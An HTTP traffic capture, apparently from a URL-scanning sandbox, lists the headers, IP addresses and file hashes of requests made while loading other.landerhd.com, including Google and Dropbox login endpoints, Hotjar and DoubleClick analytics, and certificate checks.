GET /ServiceLogin?passive=true&continue=https%3A%2F%2Fwww.google.com%2Ffavicon.ico&uilel=3&hl=en&service=mail HTTP/1.1
Host: accounts.google.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
216.58.207.237
HTTP/2 302 Found
content-type: text/html; charset=UTF-8
x-frame-options: DENY
cache-control: no-cache, no-store, max-age=0, must-revalidate
pragma: no-cache
expires: Mon, 01 Jan 1990 00:00:00 GMT
date: Sat, 03 Sep 2022 02:55:15 GMT
location: https://accounts.google.com/v3/signin/identifier?dsh=S973727434%3A1662173715896780&continue=https%3A%2F%2Fwww.google.com%2Ffavicon.ico&hl=en&passive=true&service=mail&uilel=3&flowName=GlifWebSignIn&flowEntry=ServiceLogin&ifkv=AQN2RmUFeefvQKpiBx-wI6f06q3ql5nx7HB-NZ9tBeRE3n45D2GNxjoVXEsVxkTdQL93ogG1Ey_pYw
strict-transport-security: max-age=31536000; includeSubDomains
content-security-policy: script-src 'nonce-8JKe895gTSfna64s-lSjcg' 'unsafe-inline' 'unsafe-eval';object-src 'none';base-uri 'self';report-uri /cspreport, require-trusted-types-for 'script';report-uri /cspreport
report-to: {"group":"coop_gse_qebhlk","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_qebhlk"}]}
cross-origin-opener-policy-report-only: same-origin; report-to="coop_gse_qebhlk"
content-encoding: gzip
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
content-length: 390
server: GSE
set-cookie: __Host-GAPS=1:MKPhyi0mOohjcQbjiHROzi9plkfDpg:nKCjPLW7H0lIoML6;Path=/;Expires=Mon, 02-Sep-2024 02:55:15 GMT;Secure;HttpOnly;Priority=HIGH
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  HTML document text\012- HTML document text\012- HTML document text\012- HTML document, ASCII text, with very long lines (379)
Size:   390
Md5:    b192609d0f3ca29f5d7e3179168b7c12
Sha1:   305d03faecff2e712ebc663c4ce74c477462825e
Sha256: abb116ad57c4d794aa85f5f967f4d67d25aaa2dfd8cf8f3e11dae2709d2453e6
                                        
GET /c/hotjar-2841648.js?sv=6 HTTP/1.1
Host: static.hotjar.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://other.landerhd.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
54.230.111.113
HTTP/2 200 OK
content-type: application/javascript; charset=UTF-8
access-control-allow-origin: *
content-encoding: br
cross-origin-resource-policy: cross-origin
strict-transport-security: max-age=86400; includeSubDomains
x-cache-hit: 1
x-content-type-options: nosniff
date: Sat, 03 Sep 2022 02:55:15 GMT
cache-control: max-age=60
etag: W/4d9b30f9a9ee54b99baf24a8090bace2
vary: Accept-Encoding
x-cache: RefreshHit from cloudfront
via: 1.1 a2c3c8b833b34851dca4f7753ecaae58.cloudfront.net (CloudFront)
x-amz-cf-pop: OSL50-P1
x-amz-cf-id: OlzaCRjegBASAUin6XEGl2YIdHlhIjd2nZ7dPA7VK5om6SAKJTSTpA==
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (3790)
Size:   2735
Md5:    4ad0f401581a7a99b5c10857def6b778
Sha1:   de265aac61477e4d9889eb15a0f7a06a1a39b8b7
Sha256: 64dbb6966e871b27c3dbfc02f56ddcc8f9172aa4f800b5497f33e7a7251d1d05
                                        
GET /v3/signin/identifier?dsh=S-1894852716%3A1662173715852221&continue=https%3A%2F%2Fwww.youtube.com%2Ffavicon.ico&hl=en&passive=true&service=youtube&uilel=3&flowName=GlifWebSignIn&flowEntry=ServiceLogin&ifkv=AQN2RmW9rJH5YUC-6E5LSVGZanyKywSleyyjxMdPTvnEgvYFigEtMJ6ab9qGOPpW7Ia20OUabu7L6w HTTP/1.1
Host: accounts.google.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers

                                         
216.58.207.237
HTTP/2 403 Forbidden
content-type: text/html; charset=utf-8
cache-control: no-cache, no-store, max-age=0, must-revalidate
pragma: no-cache
expires: Mon, 01 Jan 1990 00:00:00 GMT
date: Sat, 03 Sep 2022 02:55:15 GMT
vary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site
p3p: CP="This is not a P3P policy! See g.co/p3phelp for more info."
strict-transport-security: max-age=31536000; includeSubDomains
report-to: {"group":"AccountsSignInUi","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/AccountsSignInUi/external"}]}
permissions-policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
content-security-policy: script-src 'nonce-xvWML3n3c8ilnTpNVRjaFw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /v3/signin/_/AccountsSignInUi/cspreport;worker-src 'self', script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.gstatic.com https://www.google-analytics.com;report-uri /v3/signin/_/AccountsSignInUi/cspreport/allowlist, require-trusted-types-for 'script';report-uri /v3/signin/_/AccountsSignInUi/cspreport
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
cross-origin-opener-policy-report-only: same-origin; report-to="AccountsSignInUi"
content-encoding: gzip
server: ESF
x-xss-protection: 0
x-content-type-options: nosniff
set-cookie: NID=511=pD9WzmdvSz2YVeQD5z0k_a55INga3yN-A-TvnRdfRqZwVsuyCQkBuElvoCA8_k-9m70vFKJT2f0TB8rpw-44zOClhQvhHl0rr0uzspwtWQxZV_OW5J2ElDyrG2jbq7L6k1lWWQ33yD_S_IQHaoo9KgPUthc2-6QljjH7HbDsWco; expires=Sun, 05-Mar-2023 02:55:15 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  data
Size:   66315
Md5:    61d1868b85d282afa94b4ffec8357a3b
Sha1:   4aa6a7f7caac5851f2fdad0f2a27f1e89da549f6
Sha256: 6f24a6f4e1fa627cc7eeacf5b93ffea3fa75b6a188282bd43de4478095fbf51c
                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         142.250.74.3
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Sat, 03 Sep 2022 02:55:15 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            POST / HTTP/1.1 
Host: ocsp.digicert.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         93.184.220.29
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Accept-Ranges: bytes
Age: 4446
Cache-Control: 'max-age=158059'
Date: Sat, 03 Sep 2022 02:55:15 GMT
Last-Modified: Sat, 03 Sep 2022 01:41:09 GMT
Server: ECS (ska/F6FE)
X-Cache: HIT
Content-Length: 471

                                        
                                            POST /j/collect?t=dc&aip=1&_r=3&v=1&_v=j96&tid=UA-165133312-2&cid=1946346750.1662173714&jid=1643252601&gjid=1264672244&_gid=2082388919.1662173714&_u=YEBAAEAAAAAAAC~&z=596860561 HTTP/1.1 
Host: stats.g.doubleclick.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: text/plain
Content-Length: 0
Origin: https://other.landerhd.com
Connection: keep-alive
Referer: https://other.landerhd.com/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         173.194.221.155
HTTP/2 200 OK
content-type: text/plain
                                        
access-control-allow-origin: https://other.landerhd.com
strict-transport-security: max-age=10886400; includeSubDomains; preload
date: Sat, 03 Sep 2022 02:55:15 GMT
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
cache-control: no-cache, no-store, must-revalidate
last-modified: Sun, 17 May 1998 03:00:00 GMT
access-control-allow-credentials: true
x-content-type-options: nosniff
cross-origin-resource-policy: cross-origin
server: Golfe2
content-length: 1
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  very short file (no magic)
Size:   1
Md5:    c4ca4238a0b923820dcc509a6f75849b
Sha1:   356a192b7913b04c54574d18c28d46e6395428ab
Sha256: 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
                                        
                                            GET /box-1ada912494ba7fc7aca15fcef1c2a7ae.html HTTP/1.1 
Host: vars.hotjar.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://other.landerhd.com/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: iframe
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site

                                         
                                         143.204.55.118
HTTP/2 200 OK
content-type: text/html
                                        
content-length: 1044
date: Wed, 13 Jul 2022 08:33:06 GMT
accept-ranges: bytes
cache-control: max-age=31536000
content-encoding: br
cross-origin-embedder-policy: require-corp
cross-origin-resource-policy: cross-origin
etag: "0b3d3f4206ab84d8861a8cc4b2ddbe66"
last-modified: Wed, 13 Jul 2022 08:32:20 GMT
strict-transport-security: max-age=86400; includeSubDomains
x-robots-tag: none
vary: Accept-Encoding
x-cache: Hit from cloudfront
via: 1.1 095562e8748e634f880ee3c4ada2b6d0.cloudfront.net (CloudFront)
x-amz-cf-pop: OSL50-C1
x-amz-cf-id: QtRTZBvn9QnTAqAmF0_bzUj8LiQi9BUiBVWBoHjtWTcBH3JF2q4TjA==
age: 4472530
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- exported SGML document, ASCII text, with very long lines (2431), with no line terminators
Size:   1044
Md5:    0b3d3f4206ab84d8861a8cc4b2ddbe66
Sha1:   4561b7c0419b65db5c1314be2143bd1734e88d89
Sha256: ec42652b198c82469afbe5e6e69312a25425c1fd38d379cf3761b328ecd48e4a
                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         142.250.74.3
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Sat, 03 Sep 2022 02:55:16 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            POST / HTTP/1.1 
Host: ocsp.sca1b.amazontrust.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         143.204.42.165
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Content-Length: 471
Connection: keep-alive
Accept-Ranges: bytes
Cache-Control: 'max-age=158059'
Date: Sat, 03 Sep 2022 02:55:16 GMT
Last-Modified: Sat, 03 Sep 2022 01:36:52 GMT
Server: ECS (nyb/1D0D)
X-Cache: Miss from cloudfront
Via: 1.1 b9f0050ca4d212d7c855e005be54b1ac.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: OSL50-C1
X-Amz-Cf-Id: 3PSwJZBC1nh70Yw-GnDA0bxEmHT0ZukVpAso1Gw-1U31ns2PGFFvzQ==
Age: 4704

                                        
                                            POST /api/v2/client/sites/2841648/visit-data?sv=6 HTTP/1.1 
Host: in.hotjar.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: text/plain; charset=UTF-8
Content-Length: 120
Origin: https://other.landerhd.com
Connection: keep-alive
Referer: https://other.landerhd.com/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.251.112.219
HTTP/2 200 OK
content-type: application/json
                                        
date: Sat, 03 Sep 2022 02:55:16 GMT
vary: Accept-Encoding
cache-control: no-cache, no-store
access-control-allow-origin: *
access-control-allow-credentials: true
access-control-max-age: 86400
content-encoding: br
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JSON data\012- , ASCII text, with no line terminators
Size:   92
Md5:    e03464b4f14a1d296cb59883ae134e96
Sha1:   67e8cfe5f193093e715f15ed21b071dc13c8ee3d
Sha256: 51f23e4ba6b1a83ad7e297301a89147870b4c73952c3ae44d9ca7babb77d9955
                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         23.36.77.32
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "87C27C4B0288F31FAA405BA5247767D1F299938551BD284212EE487DBB0DEB63"
Last-Modified: Fri, 02 Sep 2022 20:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=9243
Expires: Sat, 03 Sep 2022 05:29:19 GMT
Date: Sat, 03 Sep 2022 02:55:16 GMT
Connection: keep-alive

                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F93ac38e4-a58e-4303-b7a1-e6c19cc7f80e.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 7332
x-amzn-requestid: b4f35a34-c467-4582-9072-954573a77ff3
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: XTiVBHorIAMF_Bg=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-63047db9-52dcb6600c9faf001774a655;Sampled=0
x-amzn-remapped-date: Tue, 23 Aug 2022 07:11:53 GMT
x-amz-cf-pop: SEA73-P1
x-cache: Hit from cloudfront
x-amz-cf-id: 5yft4kr6Uo9C3m4xt0BoFRarcgJDT3bjQr_c2QPBsbyw4xL6Omos3g==
via: 1.1 eece508272520f70691e4eebdc5a6dea.cloudfront.net (CloudFront), 1.1 ebe4011a81a36e2bf678f69ce1711330.cloudfront.net (CloudFront), 1.1 google
date: Fri, 02 Sep 2022 09:53:01 GMT
age: 61335
etag: "72796327f9481a7516aac1fbfd73a36d69f83626"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   7332
Md5:    8a1a9b226f6556f7ea2f3e990e618c78
Sha1:   72796327f9481a7516aac1fbfd73a36d69f83626
Sha256: 187b68b54b976b7a1a17928e172c9726b5583b650b982eb5cd2378a4ee2aa54d
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Fe9669117-bdb7-4eca-9f0c-900e888a9a98.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 13241
x-amzn-requestid: 80083a05-9884-48f8-983b-d4132d7c8a0c
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: X2eMHFgPIAMF9qg=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-6312771a-16fd2f06541cb4bc027f153f;Sampled=0
x-amzn-remapped-date: Fri, 02 Sep 2022 21:35:22 GMT
x-amz-cf-pop: HIO50-C1, SEA73-P1
x-cache: Hit from cloudfront
x-amz-cf-id: sMzgVvKpAdIumqHzRtYOOYP1Yjy8oQzsn6PIo50kE_3NOlrdsCaohA==
via: 1.1 7f5e0d3b9ea85d0d75063a66c0ebc840.cloudfront.net (CloudFront), 1.1 73cb83fe6699afc2791b5c690c1ff8c6.cloudfront.net (CloudFront), 1.1 google
date: Fri, 02 Sep 2022 21:49:44 GMT
age: 18332
etag: "087b7d14d84ebb179126c9dcd8964d22f24f30ab"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   13241
Md5:    d9ae49d397bc8300ce0eceda8175a3ad
Sha1:   087b7d14d84ebb179126c9dcd8964d22f24f30ab
Sha256: b9daa2fc390a97a4bd622dbdec7fe0fff7e6527ffb844a46b9b87b2bd6e0f006
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Fc55d0c73-4085-42ac-acb4-1ae9b2ffb393.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 6976
x-amzn-requestid: da379546-9525-4e13-b9f0-a6446839df66
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: X2eNeG7kIAMF4-Q=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-63127722-37399f67565b06e7111095cd;Sampled=0
x-amzn-remapped-date: Fri, 02 Sep 2022 21:35:30 GMT
x-amz-cf-pop: HIO50-C1, SEA73-P1
x-cache: Hit from cloudfront
x-amz-cf-id: alcmiW5Cb3Z96RJNXfz4F54HNERbyV71Q8hqVuNEOTUc48kItzlfHQ==
via: 1.1 da5952aa802df39905ceb16592e9698a.cloudfront.net (CloudFront), 1.1 cd64decb1403270c914848213601a674.cloudfront.net (CloudFront), 1.1 google
date: Fri, 02 Sep 2022 21:49:53 GMT
age: 18323
etag: "af3989072b658e2de119d006ae4ca1703468913d"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   6976
Md5:    c199f7fc2a2857dec134bfdb2673e28c
Sha1:   af3989072b658e2de119d006ae4ca1703468913d
Sha256: e57411ba0221f6ffa7baf7c374ec790959a66d6a683fad40883ef01cf67e35c3
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Ff7d7b349-4711-4e66-bc42-888934e385a2.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 7501
x-amzn-requestid: bf297fc4-9164-45ee-bfab-06761a52e3ba
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: X2eMJEP1IAMFdpA=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-6312771a-6b3e6416133d67a83d8a1469;Sampled=0
x-amzn-remapped-date: Fri, 02 Sep 2022 21:35:22 GMT
x-amz-cf-pop: HIO50-C1, SEA73-P1
x-cache: Hit from cloudfront
x-amz-cf-id: datd5eYK6nOAUdEpy_y4gcqsVmCqjP4qhzTnlJ9pSrquoYk2PPugTA==
via: 1.1 eece508272520f70691e4eebdc5a6dea.cloudfront.net (CloudFront), 1.1 01147dcc35d57fc0238a3c1700c13f16.cloudfront.net (CloudFront), 1.1 google
date: Fri, 02 Sep 2022 21:49:54 GMT
age: 18322
etag: "f3a3d835a37f9b23e7458f9b7bc721bc415b61cc"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   7501
Md5:    23b580e2b673257d24b9c2e80c4c48ce
Sha1:   f3a3d835a37f9b23e7458f9b7bc721bc415b61cc
Sha256: c0e3559fde3dd08cdbd360f39dddcc98dd7c1b3aebd0861cc07105872a116d11
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F7dce7ca4-6ed1-4f00-8943-1ea59bc2cfd0.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 11776
x-amzn-requestid: 59dcda55-4c16-4842-828d-2588c43178c5
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: XqdN-FzkIAMFy4w=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-630da8bf-37b930cb3e54dfa21883ead4;Sampled=0
x-amzn-remapped-date: Tue, 30 Aug 2022 06:05:51 GMT
x-amz-cf-pop: SEA19-C2
x-cache: Hit from cloudfront
x-amz-cf-id: lpnEYXkNqGxPiVSToeatrE1dQhERF7CIEs7nYZEJWJbAsL3dqs9SaA==
via: 1.1 eece508272520f70691e4eebdc5a6dea.cloudfront.net (CloudFront), 1.1 ce71f64ad5dca81beca846466f2d5008.cloudfront.net (CloudFront), 1.1 google
date: Fri, 02 Sep 2022 21:25:19 GMT
age: 19797
etag: "8f8d5827588201a2b6aa883cbf812b0db2318df2"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   11776
Md5:    940d722cca434f3267ad6a1567b92e7b
Sha1:   8f8d5827588201a2b6aa883cbf812b0db2318df2
Sha256: 33c16b50e7c317df2b91def5625e8e39c8c2ecc75054ee40f82d4b22c80eb831
                                        
                                            GET /login?cont=https%3A%2F%2Fwww.dropbox.com%2Fstatic%2Fimages%2Ficons%2Ficon_spacer-vflN3BYt2.gif HTTP/1.1 
Host: www.dropbox.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         162.125.71.18
HTTP/2 200 OK
content-type: text/html; charset=utf-8
                                        
cache-control: no-cache,no-cache, no-store
content-security-policy: base-uri 'self' ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; connect-src https://* ws://127.0.0.1:*/ws ; default-src 'none' ; font-src https://* data: ; form-action 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; img-src https://* data: blob: ; media-src https://* blob: ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; script-src 'unsafe-eval' https://www.dropbox.com/static/api/ https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client 'nonce-wx/ftw8NmaADIGeezyuy' ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; worker-src https://www.dropbox.com/static/serviceworker/ blob:, report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-dynamic ; script-src 'unsafe-eval' 'strict-dynamic' 